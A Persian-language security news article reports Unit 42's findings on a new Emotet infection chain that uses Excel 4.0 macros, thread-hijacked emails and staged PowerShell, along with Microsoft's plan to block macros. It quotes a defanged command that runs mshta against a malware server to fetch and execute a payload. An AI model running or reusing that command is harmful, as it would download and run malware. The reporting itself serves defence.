روابط عمومی شرکت ایدکو (توزیع‌کننده‌ی محصولات کسپرسکی در ایران)؛ محققین دریافتند بدافزار بدنام Emotet در یک کمپین ایمیلی که از طریق فایل‌های مخرب اکسل منتشر می‌شود، بار دیگر تاکتیک‌ها را تغییر داده است.محققین در Palo Alto Networks Unit 42 رویکرد عفونتی جدید را برای این بدافزار با حجم بالا مشاهده کرده‌اند که به دستکاری و تغییر بردارهای حمله خود برای جلوگیری از تشخیص داده می‌شود تا بدین‌ترتیب بتواند به کارهای شرورانه‌ی خود ادامه دهد. محققین واحد 42 با نام‌های صاقب خان‌زاده، تایلر هفپاپ، میکا ییتز و برد دونکان نوشتند: «زنجیره حمله جدید Emotet چندین مرحله را با انواع فایل های مختلف و اسکریپت مبهم قبل از رسیدن به بار نهایی Emotet نشان می دهد».

بردار حمله جدید - که در 21 دسامبر کشف شد و هنوز فعال است - یک فایل اکسل شامل ماکرو اکسل 4.0 مبهم را از طریق ایمیل‌های مهندسی شده اجتماعی ارائه می‌دهد. محققین در مورد آن چنین توضیح می‌دهند، «وقتی ماکرو فعال می‌شود، یک برنامه HTML را دانلود و اجرا می‌کند که دو مرحله از PowerShell برای بازیابی و اجرای بار نهایی Emotet دانلود می‌شود».

این بدافزار خیال ندارد از بین برود!

Emotet اولین بار در قاموس یک تروجان بانکی در سال 2014 حیات خود را آغاز کرد و اکنون برای تبدیل شدن به یک مکانیسم ارائه تهدید با سرویس کامل تکامل یافته است- در یک بازه زمانی خاص به هیبت بات‌نتی که بیش از 1.5 میلیون دستگاه را تحت کنترل خود درآورد ظاهر شد. عواقب معمول ابتلا به TrickBot عبارتند از تصاحب اکانت بانکی، کلاهبرداری مالی با رقم‌های بالا و حملات باج‌افزاری. در واقع، به نقل از محققین، در پایان دوران شکوفایی اولیه، خسارت تخمینی Emotet حدود 2.5 میلیارد دلار بود. بعد اینطور به نظر آمد که  Emotet با حذف مشترک مجری قانون بین‌المللی شبکه‌ای متشکل از صدها سرور بات‌نت که از این سیستم پشتیبانی می‌کردند در ژانویه ۲۰۲۱ از کار افتاده است.

با این حال، در نوامبر گذشته به دلیل حمایت‌های شریک جرمش TrickBot باری دیگر وارد میدان شد (هنوز هم تهدیدی سرسخت حساب می‌شود). از زمان بازگشتش، Emotet از  سرقت متصل[1] و انواع دیگر تاکتیک‌ها به عنوان بخشی از روش‌های جدید حمله استفاده کرده است. محققین در ادامه افزودند، «این روش، پاسخ‌های جعلی را بر اساس ایمیل‌های قانونیِ سرقتی مربوط به میزبان‌های ویندوزی که قبلاً به Emotet آلوده شده بودند، تولید می‌کند. بات‌نت از این داده‌های ایمیل سرقتی برای ایجاد پاسخ‌های جعلی با جعل هویت فرستنده اصلی استفاده می‌کند. محققین نوشتند که نمونه‌هایی از این روش شامل استفاده از لینک‌هایی می‌شود برای نصب یک بسته نصب کننده برنامه جعلی Adobe Windows که در ماه دسامبر گزارش شده بود.

استفاده از ماکروهای اکسل

بر اساس گفته‌های محققین، روش جدید عفونت Emotet با استفاده از ماکروهای اکسل نیز  چندین سویه دارد. «در برخی موارد، Emotet از آرشیو .ZIP محافظت شده با رمز عبور به عنوان پیوست به ایمیل خود استفاده می‌کند. در موارد دیگر، Emotet از یک صفحه گسترده اکسل استفاده می‌کند که مستقیماً به ایمیل متصل شده است». محققان ایمیلی را که توسط بات‌نت Emotet در تاریخ 27 ژانویه ارسال شده بود، نشان دادند که از یک رشته ایمیل دزدیده شده از ژوئن 2021 استفاده می‌کند. این ایمیل حاوی یک فایل .ZIP رمزگذاری‌شده برای دور زدن سیستم های امنیتی است.

همچنین رمز عبور فایل .ZIP در ایمیل هم در بر دارد تا قربانی بتواند محتویات آن را استخراج کند. «فایل .ZIP رمزگذاری شده حاوی یک داکیومنت اکسل با ماکروهای Excel 4.0 است. قربانی باید قبل از فعال شدن محتوای مخرب، ماکروها را در یک میزبان آسیب‌پذیر ویندوز فعال کند. پس از انجام این کار، کد ماکرو cmd.exe را برای اجرای mshta.exe اجرا می‌کند، با آرگومانی برای بازیابی و اجرای یک برنامه HTML راه دور که کد اضافی PowerShell را دانلود و اجرا می‌کند. «این کد از مبهم سازی هگز و کاراکتر برای دور زدن اقدامات تشخیص ایستا استفاده می‌کند. رشته دستور deobfuscated اجراشده از قرار زیر است:

 cmd /c mshta hxxp://91.240.118[.]168/se/s.html».

اسکریپت مبهم اولیه PowerShell به hxxp://91.240.118[.]168/se/s.png متصل می‌شود، یک URL که اسکریپت مبتنی بر متن را برای مجموعه مرحله دوم کد PowerShell که برای بازیابی یک باینری Emotet طراحی شده است، برمی‌گرداند. این کد مرحله دوم PowerShell ... حاوی 14 URL برای بازیابی باینری Emotet است. اسکریپت هر URL را تا زمانی که یک باینری Emotet با موفقیت بارگیری شود امتحان می‌کند. داشتن چندین URL در زنجیره حمله آن برای ارائه‌ی انعطاف‌پذیری بیشتر در صورت حذف یکی از URL‌ها است. مرحله نهایی زنجیره حمله زمانی رخ می‌دهد که Emotet .DLL یک PE رمزگذاری شده را از بخش منابع خود لود می‌کند.

مایکروسافت در صدد بلاک ماکروها به صورت پیش‌فرض

هفته گذشته، مایکروسافت برنامه‌ای را برای غیرفعال کردن همه ماکروها به طور پیش‌فرض در برخی برنامه‌ها اعلام کرد و اذعان داشت که این مکانیسم یکی از محبوب‌ترین راه‌های ارائه بدافزار در جهان است. غول محاسباتی خاطرنشان کرد: «برای محافظت از مشتریان خود، ما باید کار را برای فعال کردن ماکروها در فایل‌های به دست آمده از اینترنت دشوارتر کنیم. ماکروهای VBA که از اینترنت به دست می‌آیند اکنون به طور پیش‌فرض مسدود خواهند شد. سه برنامه محبوب آفیس، ورد، اکسل و پاورپوینت، به علاوه Access و Visio تحت تأثیر این تغییر قرار گرفته‌اند.

به نقل از مایکروسافت، «برای ماکروهای موجود در فایل‌های بدست‌آمده از اینترنت، کاربران دیگر نمی‌توانند محتوا را با کلیک یک دکمه فعال کنند. پیش‌فرض امن‌تر است و انتظار می‌رود کاربران بیشتری از جمله کاربران خانگی و کارکنان اطلاعات در سازمان‌های مدیریت‌شده را ایمن نگه دارد». از اواخر آوریل، به‌جای دکمه‌ای برای «فعال کردن ماکروها»، از کاربران خواسته می‌شود که دکمه «learn more» که آنها را قبل از اینکه بتوانند ماکروها را در یک دایکومنت فعال کنند، به اطلاعات اضافی می‌برد.

منبع: کسپرسکی آنلاین (ایدکو)

کسپرسکی اسم یکی از بزرگترین شرکتهای امنیتی و سازنده آنتی ویروس است که برخی از کاربران اشتباهاً این شرکت و محصولات آنتی ویروس آن را با عناوینی نظیر کسپرسکای،کاسپرسکی، کسپراسکای، کسپراسکای، و یا کاسپراسکای نیز می‌شناسد. همچنین لازم به ذکر است مدیرعامل این شرکت نیز یوجین کسپرسکی نام دارد.

[1] thread hijacking